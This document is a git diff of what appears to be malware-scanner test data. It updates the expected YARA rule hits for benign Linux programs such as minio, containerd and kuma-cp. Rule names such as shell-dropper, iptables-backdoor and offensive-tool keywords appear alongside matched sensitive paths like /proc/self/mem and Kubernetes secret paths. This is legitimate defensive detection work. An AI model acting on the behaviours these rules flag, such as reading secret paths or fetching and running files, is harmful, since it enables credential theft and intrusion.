[3P/threat_hunting/proxmark](https://github.com/chainguard-dev/malcontent/blob/main/rules/yara/threat_hunting/all.yara#Proxmark_offensive_tool_keyword) | [references 'Proxmark' tool](https://github.com/mthcht/ThreatHunting-Keywords), by mthcht | [ProxMark](https://github.com/search?q=ProxMark&type=code) | | MEDIUM | [archives/zip](https://github.com/chainguard-dev/malcontent/blob/main/rules/archives/zip.yara#zip) | Works with zip files | [zip_writer](https://github.com/search?q=zip_writer&type=code) | -| MEDIUM | [combo/critical_paths](https://github.com/chainguard-dev/malcontent/blob/main/rules/combo/critical_paths.yara#linux_critical_system_paths_medium) | accesses multiple critical Linux paths | [/proc/cpH](https://github.com/search?q=%2Fproc%2FcpH&type=code)
[/proc/cpuinfo](https://github.com/search?q=%2Fproc%2Fcpuinfo&type=code)
[/proc/driver/nvidia/params](https://github.com/search?q=%2Fproc%2Fdriver%2Fnvidia%2Fparams&type=code)
[/proc/loadavg](https://github.com/search?q=%2Fproc%2Floadavg&type=code)
[/proc/meH](https://github.com/search?q=%2Fproc%2FmeH&type=code)
[/proc/meminfo](https://github.com/search?q=%2Fproc%2Fmeminfo&type=code)
[/proc/seH](https://github.com/search?q=%2Fproc%2FseH&type=code)
[/proc/self/cmdline](https://github.com/search?q=%2Fproc%2Fself%2Fcmdline&type=code)
[/proc/self/exe](https://github.com/search?q=%2Fproc%2Fself%2Fexe&type=code)
[/proc/self/fdinfo/](https://github.com/search?q=%2Fproc%2Fself%2Ffdinfo%2F&type=code)
[/proc/self/gid_map](https://github.com/search?q=%2Fproc%2Fself%2Fgid_map&type=code)
[/proc/self/maps](https://github.com/search?q=%2Fproc%2Fself%2Fmaps&type=code)
[/proc/self/mem](https://github.com/search?q=%2Fproc%2Fself%2Fmem&type=code)
[/proc/self/ns/ipc](https://github.com/search?q=%2Fproc%2Fself%2Fns%2Fipc&type=code)
[/proc/self/ns/mnt](https://github.com/search?q=%2Fproc%2Fself%2Fns%2Fmnt&type=code)
[/proc/self/ns/net](https://github.com/search?q=%2Fproc%2Fself%2Fns%2Fnet&type=code)
[/proc/self/ns/pid](https://github.com/search?q=%2Fproc%2Fself%2Fns%2Fpid&type=code)
[/proc/self/ns/user](https://github.com/search?q=%2Fproc%2Fself%2Fns%2Fuser&type=code)
[/proc/self/ns/uts](https://github.com/search?q=%2Fproc%2Fself%2Fns%2Futs&type=code)
[/proc/self/setgroups](https://github.com/search?q=%2Fproc%2Fself%2Fsetgroups&type=code)
[/proc/self/status](https://github.com/search?q=%2Fproc%2Fself%2Fstatus&type=code)
[/proc/self/uid_map](https://github.com/search?q=%2Fproc%2Fself%2Fuid_map&type=code)
[/proc/stat](https://github.com/search?q=%2Fproc%2Fstat&type=code)
[/proc/sys/fs/inotify/max_user_watches](https://github.com/search?q=%2Fproc%2Fsys%2Ffs%2Finotify%2Fmax_user_watches&type=code)
[/proc/sys/fs/nr_open](https://github.com/search?q=%2Fproc%2Fsys%2Ffs%2Fnr_open&type=code)
[/proc/sys/kernel/yama/ptrace_scope](https://github.com/search?q=%2Fproc%2Fsys%2Fkernel%2Fyama%2Fptrace_scope&type=code)
[/proc/tty/drivers](https://github.com/search?q=%2Fproc%2Ftty%2Fdrivers&type=code)
[/proc/uptime](https://github.com/search?q=%2Fproc%2Fuptime&type=code)
[/sys/class/bluetooth](https://github.com/search?q=%2Fsys%2Fclass%2Fbluetooth&type=code)
[/sys/class/input](https://github.com/search?q=%2Fsys%2Fclass%2Finput&type=code)
[/sys/class/tty/tty0/active](https://github.com/search?q=%2Fsys%2Fclass%2Ftty%2Ftty0%2Factive&type=code)
[/sys/class/video4linux/](https://github.com/search?q=%2Fsys%2Fclass%2Fvideo4linux%2F&type=code)
[/sys/devices/system/cpu/cpu0/tsc_freq_khz](https://github.com/search?q=%2Fsys%2Fdevices%2Fsystem%2Fcpu%2Fcpu0%2Ftsc_freq_khz&type=code)
[/sys/devices/virtual/misc/uhid](https://github.com/search?q=%2Fsys%2Fdevices%2Fvirtual%2Fmisc%2Fuhid&type=code)
[/tmp/__v8_gc__](https://github.com/search?q=%2Ftmp%2F__v8_gc__&type=code)
[/tmp/chromium-upload-XXXXXXXXXXXXXXXX](https://github.com/search?q=%2Ftmp%2Fchromium-upload-XXXXXXXXXXXXXXXX&type=code)
[/tmp/node-repl-sock](https://github.com/search?q=%2Ftmp%2Fnode-repl-sock&type=code)
[/tmp/perf-](https://github.com/search?q=%2Ftmp%2Fperf-&type=code)
[/tmp/perfetto-consumer](https://github.com/search?q=%2Ftmp%2Fperfetto-consumer&type=code)
[/tmp/perfetto-producer](https://github.com/search?q=%2Ftmp%2Fperfetto-producer&type=code)
[/usr/bin/wget](https://github.com/search?q=%2Fusr%2Fbin%2Fwget&type=code)
[/var/run/user](https://github.com/search?q=%2Fvar%2Frun%2Fuser&type=code) | | MEDIUM | [combo/net/tunnel_proxy](https://github.com/chainguard-dev/malcontent/blob/main/rules/combo/net/tunnel_proxy.yara#tunnel_proxy) | network tunnel proxy | [Proxy](https://github.com/search?q=Proxy&type=code)
[SOCKS5](https://github.com/search?q=SOCKS5&type=code)
[TLS13](https://github.com/search?q=TLS13&type=code)
[TLSVersion](https://github.com/search?q=TLSVersion&type=code)
[Tunnel](https://github.com/search?q=Tunnel&type=code)
[crypto](https://github.com/search?q=crypto&type=code)
[proxy](https://github.com/search?q=proxy&type=code)
[socket](https://github.com/search?q=socket&type=code)
[tunnel](https://github.com/search?q=tunnel&type=code) | | MEDIUM | [crypto/rc4/constants](https://github.com/chainguard-dev/malcontent/blob/main/rules/crypto/rc4-constants.yara#rc4_constants) | [rc4 constants](https://blog.talosintelligence.com/2014/06/an-introduction-to-recognizing-and.html), by shellcromancer | [#"!](https://github.com/search?q=%23%22%21&type=code)
$opt0
$opt1
$opt2
$opt30
$opt4
$opt5
$opt6
$opt7
['&%$](https://github.com/search?q=%27%26%25%24&type=code)
[+*)(](https://github.com/search?q=%2B%2A%29%28&type=code)
[/.-,](https://github.com/search?q=%2F.-%2C&type=code)
[3210](https://github.com/search?q=3210&type=code)
[7654](https://github.com/search?q=7654&type=code)
[;:98](https://github.com/search?q=%3B%3A98&type=code)
[?>=<](https://github.com/search?q=%3F%3E%3D%3C&type=code)
[CBA@](https://github.com/search?q=CBA%40&type=code)
[GFED](https://github.com/search?q=GFED&type=code)
[KJIH](https://github.com/search?q=KJIH&type=code)
[ONML](https://github.com/search?q=ONML&type=code)
[SRQP](https://github.com/search?q=SRQP&type=code)
[WVUT](https://github.com/search?q=WVUT&type=code)
[[ZYX](https://github.com/search?q=%5BZYX&type=code)
[_^]\](https://github.com/search?q=_%5E%5D%5C&type=code)
[cba`](https://github.com/search?q=cba%60&type=code)
[gfed](https://github.com/search?q=gfed&type=code)
[kjih](https://github.com/search?q=kjih&type=code)
[onml](https://github.com/search?q=onml&type=code)
[srqp](https://github.com/search?q=srqp&type=code)
[wvut](https://github.com/search?q=wvut&type=code)
[{zyx](https://github.com/search?q=%7Bzyx&type=code)
[](https://github.com/search?q=%83%82%81%80&type=code)
[](https://github.com/search?q=%87%86%85%84&type=code)
[](https://github.com/search?q=%8B%8A%89%88&type=code)
[](https://github.com/search?q=%8F%8E%8D%8C&type=code)
[](https://github.com/search?q=%93%92%91%90&type=code)
[](https://github.com/search?q=%97%96%95%94&type=code)
[](https://github.com/search?q=%9B%9A%99%98&type=code)
[](https://github.com/search?q=%9F%9E%9D%9C&type=code)
[](https://github.com/search?q=%A3%A2%A1%A0&type=code)
[](https://github.com/search?q=%A7%A6%A5%A4&type=code)
[](https://github.com/search?q=%AB%AA%A9%A8&type=code)
[](https://github.com/search?q=%AF%AE%AD%AC&type=code)
[](https://github.com/search?q=%B3%B2%B1%B0&type=code)
[](https://github.com/search?q=%B7%B6%B5%B4&type=code)
[](https://github.com/search?q=%BB%BA%B9%B8&type=code)
[](https://github.com/search?q=%BF%BE%BD%BC&type=code)
[](https://github.com/search?q=%C3%C2%C1%C0&type=code)
[](https://github.com/search?q=%C7%C6%C5%C4&type=code)
[](https://github.com/search?q=%CB%CA%C9%C8&type=code)
[](https://github.com/search?q=%CF%CE%CD%CC&type=code)
[](https://github.com/search?q=%D3%D2%D1%D0&type=code)
[](https://github.com/search?q=%D7%D6%D5%D4&type=code)
[](https://github.com/search?q=%DB%DA%D9%D8&type=code)
[](https://github.com/search?q=%DF%DE%DD%DC&type=code)
[](https://github.com/search?q=%E3%E2%E1%E0&type=code)
[](https://github.com/search?q=%E7%E6%E5%E4&type=code)
[](https://github.com/search?q=%EB%EA%E9%E8&type=code)
[](https://github.com/search?q=%EF%EE%ED%EC&type=code)
[](https://github.com/search?q=%F3%F2%F1%F0&type=code)
[](https://github.com/search?q=%F7%F6%F5%F4&type=code)
[](https://github.com/search?q=%FB%FA%F9%F8&type=code)
[](https://github.com/search?q=%FF%FE%FD%FC&type=code) | | MEDIUM | [data/embedded/base64/terms](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/embedded-base64-terms.yara#contains_base64) | Contains base64 CERTIFICATE | [Q0VSVElGSUNBVE::$CERTIFICATE](https://github.com/search?q=Q0VSVElGSUNBVE%3A%3A%24CERTIFICATE&type=code)
[RpcmVjdG9ye::$directory](https://github.com/search?q=RpcmVjdG9ye%3A%3A%24directory&type=code)
[ZGlyZWN0b3J5::$directory](https://github.com/search?q=ZGlyZWN0b3J5%3A%3A%24directory&type=code) | diff --git a/test_data/linux/clean/containerd.simple b/test_data/linux/clean/containerd.simple index 0681283f..e14c0120 100644 --- a/test_data/linux/clean/containerd.simple +++ b/test_data/linux/clean/containerd.simple @@ -2,7 +2,7 @@ 3P/threat_hunting/hijacker: medium 3P/threat_hunting/privilegeescalation: medium archives/zip: medium -combo/critical_paths: medium +combo/degrader/linux_paths: medium combo/net/host_port: medium compression/bzip2: low compression/gzip: low diff --git a/test_data/linux/clean/emscripten.sh.simple b/test_data/linux/clean/emscripten.sh.simple new file mode 100644 index 00000000..f7312e43 --- /dev/null +++ b/test_data/linux/clean/emscripten.sh.simple @@ -0,0 +1,13 @@ +# linux/clean/emscripten.sh: medium +combo/dropper/shell: medium +fs/file/delete: medium +fs/file/delete/forcibly: low +fs/file/make_executable: medium +fs/permission/modify: medium +net/fetch: medium +process/chdir: low +ref/path/hidden: medium +ref/path/relative: medium +ref/path/root: medium +ref/path/tmp: medium +ref/site/url: low diff --git a/test_data/linux/clean/http-fingerprints.lua.simple b/test_data/linux/clean/http-fingerprints.lua.simple new file mode 100644 index 00000000..9157d65d --- /dev/null +++ b/test_data/linux/clean/http-fingerprints.lua.simple @@ -0,0 +1,28 @@ +# linux/clean/http-fingerprints.lua: high +3P/signature_base/hacktool/strings: medium +3P/threat_hunting/metasploit: medium +3P/threat_hunting/nikto: medium +3P/threat_hunting/rapid7: medium +3P/threat_hunting/seclists: medium +databases/mysql: medium +fs/file/read: low +net/download: medium +net/http/post: medium +net/http/request: low +net/ssh: medium +net/upload: medium +ref/cve: medium +ref/path/etc: low +ref/path/home: medium +ref/path/root: medium +ref/path/tmp: medium +ref/path/var: low +ref/program/nmap: medium +ref/site/grayware: high +ref/site/php: medium +ref/site/url: low +ref/words/agent: medium +ref/words/password: low +ref/words/plugin: low +secrets/htpasswd: medium +tools/vulncheck/metasploit: high diff --git a/test_data/linux/clean/kuma-cp.simple b/test_data/linux/clean/kuma-cp.simple index 3d58461a..20cafb61 100644 --- a/test_data/linux/clean/kuma-cp.simple +++ b/test_data/linux/clean/kuma-cp.simple @@ -3,7 +3,6 @@ 3P/threat_hunting/privilegeescalation: medium archives/zip: medium combo/backdoor/iptables: medium -combo/critical_paths: medium combo/dropper/shell: medium combo/net/host_port: medium combo/net/tunnel_proxy: medium diff --git a/test_data/linux/clean/linux-s390x.sh.simple b/test_data/linux/clean/linux-s390x.sh.simple new file mode 100644 index 00000000..8d8033b6 --- /dev/null +++ b/test_data/linux/clean/linux-s390x.sh.simple @@ -0,0 +1,8 @@ +# linux/clean/linux-s390x.sh: medium +combo/dropper/shell: medium +fs/directory/create: low +fs/permission/modify: medium +net/fetch: medium +process/chdir: low +ref/site/github_raw: medium +ref/site/url: low diff --git a/test_data/linux/clean/linux-sparc64.sh.simple b/test_data/linux/clean/linux-sparc64.sh.simple new file mode 100644 index 00000000..6571d7d0 --- /dev/null +++ b/test_data/linux/clean/linux-sparc64.sh.simple @@ -0,0 +1,7 @@ +# linux/clean/linux-sparc64.sh: medium +combo/dropper/shell: medium +fs/directory/create: low +fs/permission/modify: medium +net/fetch: medium +process/chdir: low +ref/site/url: low diff --git a/test_data/linux/clean/melange.simple b/test_data/linux/clean/melange.simple index 1bd15fa3..b98a494b 100644 --- a/test_data/linux/clean/melange.simple +++ b/test_data/linux/clean/melange.simple @@ -9,7 +9,6 @@ cloud/aws/metadata: low cloud/google/metadata: low cloud/google/storage: low combo/backdoor/kill_rm: medium -combo/critical_paths: medium combo/dropper/shell: medium combo/net/tunnel_proxy: medium compression/bzip2: low diff --git a/test_data/linux/clean/minio.x86_64.md b/test_data/linux/clean/minio.x86_64.md index 72496575..52994098 100644 --- a/test_data/linux/clean/minio.x86_64.md +++ b/test_data/linux/clean/minio.x86_64.md @@ -10,7 +10,7 @@ | MEDIUM | [3P/threat_hunting/torproject](https://github.com/chainguard-dev/malcontent/blob/main/rules/yara/threat_hunting/all.yara#torproject_offensive_tool_keyword) | [references 'torproject' tool](https://github.com/mthcht/ThreatHunting-Keywords), by mthcht | [torproject](https://github.com/search?q=torproject&type=code) | | MEDIUM | [archives/zip](https://github.com/chainguard-dev/malcontent/blob/main/rules/archives/zip.yara#zip) | Works with zip files | [archive/zip](https://github.com/search?q=archive%2Fzip&type=code)
[zip files](https://github.com/search?q=zip+files&type=code) | | MEDIUM | [combo/backdoor/iptables](https://github.com/chainguard-dev/malcontent/blob/main/rules/combo/backdoor/iptables.yara#iptables_upload_http) | uploads, uses iptables and HTTP | [HTTP](https://github.com/search?q=HTTP&type=code)
[iptables](https://github.com/search?q=iptables&type=code)
[uploadCONSOLE](https://github.com/search?q=uploadCONSOLE&type=code)
[uploadEnabled](https://github.com/search?q=uploadEnabled&type=code)
[uploadFileFunction](https://github.com/search?q=uploadFileFunction&type=code)
[uploadFilePromises](https://github.com/search?q=uploadFilePromises&type=code)
[uploadFiles](https://github.com/search?q=uploadFiles&type=code)
[uploadFolderAction](https://github.com/search?q=uploadFolderAction&type=code)
[uploadFolderAllowed](https://github.com/search?q=uploadFolderAllowed&type=code)
[uploadFolderFunction](https://github.com/search?q=uploadFolderFunction&type=code)
[uploadID](https://github.com/search?q=uploadID&type=code)
[uploadIdversionsContin](https://github.com/search?q=uploadIdversionsContin&type=code)
[uploadMINIO](https://github.com/search?q=uploadMINIO&type=code)
[uploadObjectAllowed](https://github.com/search?q=uploadObjectAllowed&type=code)
[uploadOptionsOpen](https://github.com/search?q=uploadOptionsOpen&type=code)
[uploadOptionsSetOpen](https://github.com/search?q=uploadOptionsSetOpen&type=code)
[uploadPagesFromURLPrep](https://github.com/search?q=uploadPagesFromURLPrep&type=code)
[uploadPagesFromURLResp](https://github.com/search?q=uploadPagesFromURLResp&type=code)
[uploadPagesPreparer](https://github.com/search?q=uploadPagesPreparer&type=code)
[uploadPagesResponder](https://github.com/search?q=uploadPagesResponder&type=code)
[uploadPartCopyC](https://github.com/search?q=uploadPartCopyC&type=code)
[uploadPartReq](https://github.com/search?q=uploadPartReq&type=code)
[uploadPath](https://github.com/search?q=uploadPath&type=code)
[uploadPreparer](https://github.com/search?q=uploadPreparer&type=code)
[uploadPromise](https://github.com/search?q=uploadPromise&type=code)
[uploadRequest](https://github.com/search?q=uploadRequest&type=code)
[uploadResponder](https://github.com/search?q=uploadResponder&type=code)
[uploadSize](https://github.com/search?q=uploadSize&type=code)
[uploadSourceToTargetUR](https://github.com/search?q=uploadSourceToTargetUR&type=code)
[uploadThe](https://github.com/search?q=uploadThe&type=code)
[uploadTimeoutTimer](https://github.com/search?q=uploadTimeoutTimer&type=code)
[uploadTypeADMIN](https://github.com/search?q=uploadTypeADMIN&type=code)
[uploadUrl](https://github.com/search?q=uploadUrl&type=code)
[uploadedPartRes](https://github.com/search?q=uploadedPartRes&type=code)
[uploadedUnable](https://github.com/search?q=uploadedUnable&type=code)
[uploaderKey](https://github.com/search?q=uploaderKey&type=code)
[uploadincrease](https://github.com/search?q=uploadincrease&type=code)
[uploading](https://github.com/search?q=uploading&type=code)
[uploadminio](https://github.com/search?q=uploadminio&type=code)
[uploadrate](https://github.com/search?q=uploadrate&type=code)
[uploadsX](https://github.com/search?q=uploadsX&type=code)
[uploadsblake](https://github.com/search?q=uploadsblake&type=code)
[uploadsenable](https://github.com/search?q=uploadsenable&type=code)
[uploadsforce](https://github.com/search?q=uploadsforce&type=code)
[uploaduse](https://github.com/search?q=uploaduse&type=code) | -| MEDIUM | [combo/critical_paths](https://github.com/chainguard-dev/malcontent/blob/main/rules/combo/critical_paths.yara#linux_critical_system_paths_medium) | accesses multiple critical Linux paths | [/proc/cmdline/v3/speedtest/v3/top/lock](https://github.com/search?q=%2Fproc%2Fcmdline%2Fv3%2Fspeedtest%2Fv3%2Ftop%2Flock&type=code)
[/proc/errno](https://github.com/search?q=%2Fproc%2Ferrno&type=code)
[/proc/mountspart.](https://github.com/search?q=%2Fproc%2Fmountspart.&type=code)
[/proc/seH](https://github.com/search?q=%2Fproc%2FseH&type=code)
[/proc/self/auxv](https://github.com/search?q=%2Fproc%2Fself%2Fauxv&type=code)
[/proc/self/cpusetError](https://github.com/search?q=%2Fproc%2Fself%2FcpusetError&type=code)
[/proc/self/exerequestPaymentlegacy](https://github.com/search?q=%2Fproc%2Fself%2FexerequestPaymentlegacy&type=code)
[/proc/self/maps](https://github.com/search?q=%2Fproc%2Fself%2Fmaps&type=code)
[/proc/statSyntax](https://github.com/search?q=%2Fproc%2FstatSyntax&type=code)
[/proc/sys/fs/pipe-max-sizeUnable](https://github.com/search?q=%2Fproc%2Fsys%2Ffs%2Fpipe-max-sizeUnable&type=code)
[/proc/sys/kernel/hostnamettfb_seconds_](https://github.com/search?q=%2Fproc%2Fsys%2Fkernel%2Fhostnamettfb_seconds_&type=code)
[/proc/sys/kernel/ngroups_max](https://github.com/search?q=%2Fproc%2Fsys%2Fkernel%2Fngroups_max&type=code)
[/proc/sys/kernel/rtsig-max](https://github.com/search?q=%2Fproc%2Fsys%2Fkernel%2Frtsig-max&type=code)
[/proc/sys/kernel/threads-maxbinary](https://github.com/search?q=%2Fproc%2Fsys%2Fkernel%2Fthreads-maxbinary&type=code)
[/proc/sys/net/core/somaxconnCurrent](https://github.com/search?q=%2Fproc%2Fsys%2Fnet%2Fcore%2FsomaxconnCurrent&type=code)
[/proc/version_signatureexec](https://github.com/search?q=%2Fproc%2Fversion_signatureexec&type=code)
[/proc/versionno](https://github.com/search?q=%2Fproc%2Fversionno&type=code)
[/sys/class/block/run/udev/data/bxfs-error-](https://github.com/search?q=%2Fsys%2Fclass%2Fblock%2Frun%2Fudev%2Fdata%2Fbxfs-error-&type=code)
[/sys/class/dmi/id/product_nameinvalid](https://github.com/search?q=%2Fsys%2Fclass%2Fdmi%2Fid%2Fproduct_nameinvalid&type=code)
[/sys/class/dmi/id/product_uuid](https://github.com/search?q=%2Fsys%2Fclass%2Fdmi%2Fid%2Fproduct_uuid&type=code)
[/sys/devices/system/cpumismatching](https://github.com/search?q=%2Fsys%2Fdevices%2Fsystem%2Fcpumismatching&type=code)
[/tmp/.trashDecomCopyDeleteMarkerDecom](https://github.com/search?q=%2Ftmp%2F.trashDecomCopyDeleteMarkerDecom&type=code)
[/tmp/dest/](https://github.com/search?q=%2Ftmp%2Fdest%2F&type=code)
[/tmp/dir/](https://github.com/search?q=%2Ftmp%2Fdir%2F&type=code)
[/tmp/hello-world.go](https://github.com/search?q=%2Ftmp%2Fhello-world.go&type=code)
[/tmp/myminio-iam-info.zip](https://github.com/search?q=%2Ftmp%2Fmyminio-iam-info.zip&type=code)
[/tmp/mysql.sockclientFoundRowsmultiSt](https://github.com/search?q=%2Ftmp%2Fmysql.sockclientFoundRowsmultiSt&type=code)
[/tmp/policy.json.](https://github.com/search?q=%2Ftmp%2Fpolicy.json.&type=code)
[/tmp/this/new/dir1](https://github.com/search?q=%2Ftmp%2Fthis%2Fnew%2Fdir1&type=code)
[/tmp/writeonly.json](https://github.com/search?q=%2Ftmp%2Fwriteonly.json&type=code)
[/usr/bin/env](https://github.com/search?q=%2Fusr%2Fbin%2Fenv&type=code)
[/usr/bin/lsb_releaseenterpriseenterprise](https://github.com/search?q=%2Fusr%2Fbin%2Flsb_releaseenterpriseenterprise&type=code)
[/usr/bin/lxc-versiongogoproto.protosizer](https://github.com/search?q=%2Fusr%2Fbin%2Flxc-versiongogoproto.protosizer&type=code)
[/usr/bin/raspi-config/sys/fs/cgroup/memo](https://github.com/search?q=%2Fusr%2Fbin%2Fraspi-config%2Fsys%2Ffs%2Fcgroup%2Fmemo&type=code)
[/var/run/console.sock](https://github.com/search?q=%2Fvar%2Frun%2Fconsole.sock&type=code)
[/var/run/log/definitionsinvalid](https://github.com/search?q=%2Fvar%2Frun%2Flog%2Fdefinitionsinvalid&type=code)
[/var/run/secrets/kubernetes.io/serviceac](https://github.com/search?q=%2Fvar%2Frun%2Fsecrets%2Fkubernetes.io%2Fserviceac&type=code)
[/var/run/syslogschema](https://github.com/search?q=%2Fvar%2Frun%2Fsyslogschema&type=code)
[sysctl](https://github.com/search?q=sysctl&type=code) | +| MEDIUM | [combo/degrader/linux_paths](https://github.com/chainguard-dev/malcontent/blob/main/rules/combo/degrader/linux_paths.yara#linux_critical_system_paths) | accesses multiple critical Linux paths | [/etc/selinux/config/v3/speedtest/drive/v3/pr](https://github.com/search?q=%2Fetc%2Fselinux%2Fconfig%2Fv3%2Fspeedtest%2Fdrive%2Fv3%2Fpr&type=code)
[/sys/class/block/run/udev/data/bxfs-error-](https://github.com/search?q=%2Fsys%2Fclass%2Fblock%2Frun%2Fudev%2Fdata%2Fbxfs-error-&type=code)
[/sys/class/dmi/id/product_nameinvalid](https://github.com/search?q=%2Fsys%2Fclass%2Fdmi%2Fid%2Fproduct_nameinvalid&type=code)
[/sys/class/dmi/id/product_uuid](https://github.com/search?q=%2Fsys%2Fclass%2Fdmi%2Fid%2Fproduct_uuid&type=code)
[/sys/devices/system/cpumismatching](https://github.com/search?q=%2Fsys%2Fdevices%2Fsystem%2Fcpumismatching&type=code)
[/tmp/.trashDecomCopyDeleteMarkerDecom](https://github.com/search?q=%2Ftmp%2F.trashDecomCopyDeleteMarkerDecom&type=code)
[/tmp/dest/](https://github.com/search?q=%2Ftmp%2Fdest%2F&type=code)
[/tmp/dir/](https://github.com/search?q=%2Ftmp%2Fdir%2F&type=code)
[/tmp/hello-world.go](https://github.com/search?q=%2Ftmp%2Fhello-world.go&type=code)
[/tmp/myminio-iam-info.zip](https://github.com/search?q=%2Ftmp%2Fmyminio-iam-info.zip&type=code)
[/tmp/mysql.sockclientFoundRowsmultiSt](https://github.com/search?q=%2Ftmp%2Fmysql.sockclientFoundRowsmultiSt&type=code)
[/tmp/policy.json.](https://github.com/search?q=%2Ftmp%2Fpolicy.json.&type=code)
[/tmp/this/new/dir1](https://github.com/search?q=%2Ftmp%2Fthis%2Fnew%2Fdir1&type=code)
[/tmp/writeonly.json](https://github.com/search?q=%2Ftmp%2Fwriteonly.json&type=code)
[/var/run/console.sock](https://github.com/search?q=%2Fvar%2Frun%2Fconsole.sock&type=code)
[/var/run/log/definitionsinvalid](https://github.com/search?q=%2Fvar%2Frun%2Flog%2Fdefinitionsinvalid&type=code)
[/var/run/secrets/kubernetes.io/serviceac](https://github.com/search?q=%2Fvar%2Frun%2Fsecrets%2Fkubernetes.io%2Fserviceac&type=code)
[/var/run/syslogschema](https://github.com/search?q=%2Fvar%2Frun%2Fsyslogschema&type=code)
[sysctl](https://github.com/search?q=sysctl&type=code) | | MEDIUM | [combo/dropper/shell](https://github.com/chainguard-dev/malcontent/blob/main/rules/combo/dropper/shell.yara#curl_chmod_relative_run) | may fetch file, make it executable, and run it | [./action](https://github.com/search?q=.%2Faction&type=code)
[./agent-base](https://github.com/search?q=.%2Fagent-base&type=code)
[./alt](https://github.com/search?q=.%2Falt&type=code)
[./annotation](https://github.com/search?q=.%2Fannotation&type=code)
[./api/errors](https://github.com/search?q=.%2Fapi%2Ferrors&type=code)
[./array.js](https://github.com/search?q=.%2Farray.js&type=code)
[./ascending.js](https://github.com/search?q=.%2Fascending.js&type=code)
[./ast-to-react.js](https://github.com/search?q=.%2Fast-to-react.js&type=code)
[./attach-listener](https://github.com/search?q=.%2Fattach-listener&type=code)
[./attach-shared-listeners](https://github.com/search?q=.%2Fattach-shared-listeners&type=code)
[./azure-regions](https://github.com/search?q=.%2Fazure-regions&type=code)
[./base](https://github.com/search?q=.%2Fbase&type=code)
[./basis.js](https://github.com/search?q=.%2Fbasis.js&type=code)
[./batch](https://github.com/search?q=.%2Fbatch&type=code)
[./be](https://github.com/search?q=.%2Fbe&type=code)
[./bisector.js](https://github.com/search?q=.%2Fbisector.js&type=code)
[./blank-line.js](https://github.com/search?q=.%2Fblank-line.js&type=code)
[./blockquote.js](https://github.com/search?q=.%2Fblockquote.js&type=code)
[./break.js](https://github.com/search?q=.%2Fbreak.js&type=code)
[./canvas.js](https://github.com/search?q=.%2Fcanvas.js&type=code)
[./case-sensitive-transform.js](https://github.com/search?q=.%2Fcase-sensitive-transform.js&type=code)
[./cjs/react-dom.development.js](https://github.com/search?q=.%2Fcjs%2Freact-dom.development.js&type=code)
[./cjs/react-dom.production.min.js](https://github.com/search?q=.%2Fcjs%2Freact-dom.production.min.js&type=code)
[./cjs/react-is.development.js](https://github.com/search?q=.%2Fcjs%2Freact-is.development.js&type=code)
[./cjs/react-is.production.min.js](https://github.com/search?q=.%2Fcjs%2Freact-is.production.min.js&type=code)
[./cjs/react.development.js](https://github.com/search?q=.%2Fcjs%2Freact.development.js&type=code)
[./cjs/react.production.min.js](https://github.com/search?q=.%2Fcjs%2Freact.production.min.js&type=code)
[./cjs/scheduler.development.js](https://github.com/search?q=.%2Fcjs%2Fscheduler.development.js&type=code)
[./cjs/scheduler.production.min.js](https://github.com/search?q=.%2Fcjs%2Fscheduler.production.min.js&type=code)
[./code.js](https://github.com/search?q=.%2Fcode.js&type=code)
[./color.js](https://github.com/search?q=.%2Fcolor.js&type=code)
[./common/api](https://github.com/search?q=.%2Fcommon%2Fapi&type=code)
[./common/types](https://github.com/search?q=.%2Fcommon%2Ftypes&type=code)
[./common/utils](https://github.com/search?q=.%2Fcommon%2Futils&type=code)
[./comparator](https://github.com/search?q=.%2Fcomparator&type=code)
[./complex-types.js](https://github.com/search?q=.%2Fcomplex-types.js&type=code)
[./components/connect](https://github.com/search?q=.%2Fcomponents%2Fconnect&type=code)
[./config](https://github.com/search?q=.%2Fconfig&type=code)
[./constant.js](https://github.com/search?q=.%2Fconstant.js&type=code)
[./constants.js](https://github.com/search?q=.%2Fconstants.js&type=code)
[./constructors/css](https://github.com/search?q=.%2Fconstructors%2Fcss&type=code)
[./constructors/keyframes](https://github.com/search?q=.%2Fconstructors%2Fkeyframes&type=code)
[./constructs.js](https://github.com/search?q=.%2Fconstructs.js&type=code)
[./content](https://github.com/search?q=.%2Fcontent&type=code)
[./context](https://github.com/search?q=.%2Fcontext&type=code)
[./continuous.js](https://github.com/search?q=.%2Fcontinuous.js&type=code)
[./conversions.js](https://github.com/search?q=.%2Fconversions.js&type=code)
[./create-or-join](https://github.com/search?q=.%2Fcreate-or-join&type=code)
[./create-tokenizer.js](https://github.com/search?q=.%2Fcreate-tokenizer.js&type=code)
[./credentials.json](https://github.com/search?q=.%2Fcredentials.json&type=code)
[./css](https://github.com/search?q=.%2Fcss&type=code)
[./curve/linear.js](https://github.com/search?q=.%2Fcurve%2Flinear.js&type=code)
[./data/ play/another-bucket/](https://github.com/search?q=.%2Fdata%2F+play%2Fanother-bucket%2F&type=code)
[./date.js](https://github.com/search?q=.%2Fdate.js&type=code)
[./datetime.js](https://github.com/search?q=.%2Fdatetime.js&type=code)
[./day.js](https://github.com/search?q=.%2Fday.js&type=code)
[./debounce](https://github.com/search?q=.%2Fdebounce&type=code)
[./define.js](https://github.com/search?q=.%2Fdefine.js&type=code)
[./defined-info.js](https://github.com/search?q=.%2Fdefined-info.js&type=code)
[./delete.js](https://github.com/search?q=.%2Fdelete.js&type=code)
[./descending.js](https://github.com/search?q=.%2Fdescending.js&type=code)
[./digits.js](https://github.com/search?q=.%2Fdigits.js&type=code)
[./display/](https://github.com/search?q=.%2Fdisplay%2F&type=code)
[./dom](https://github.com/search?q=.%2Fdom&type=code)
[./draw](https://github.com/search?q=.%2Fdraw&type=code)
[./duration.js](https://github.com/search?q=.%2Fduration.js&type=code)
[./easing](https://github.com/search?q=.%2Feasing&type=code)
[./editor.js](https://github.com/search?q=.%2Feditor.js&type=code)
[./editor/editor.js](https://github.com/search?q=.%2Feditor%2Feditor.js&type=code)
[./emphasis.js](https://github.com/search?q=.%2Femphasis.js&type=code)
[./empties](https://github.com/search?q=.%2Fempties&type=code)
[./english.js](https://github.com/search?q=.%2Fenglish.js&type=code)
[./entities/create](https://github.com/search?q=.%2Fentities%2Fcreate&type=code)
[./entities/models](https://github.com/search?q=.%2Fentities%2Fmodels&type=code)
[./equals](https://github.com/search?q=.%2Fequals&type=code)
[./errors.js](https://github.com/search?q=.%2Ferrors.js&type=code)
[./eval](https://github.com/search?q=.%2Feval&type=code)
[./exceptions](https://github.com/search?q=.%2Fexceptions&type=code)
[./exponent.js](https://github.com/search?q=.%2Fexponent.js&type=code)
[./exports](https://github.com/search?q=.%2Fexports&type=code)
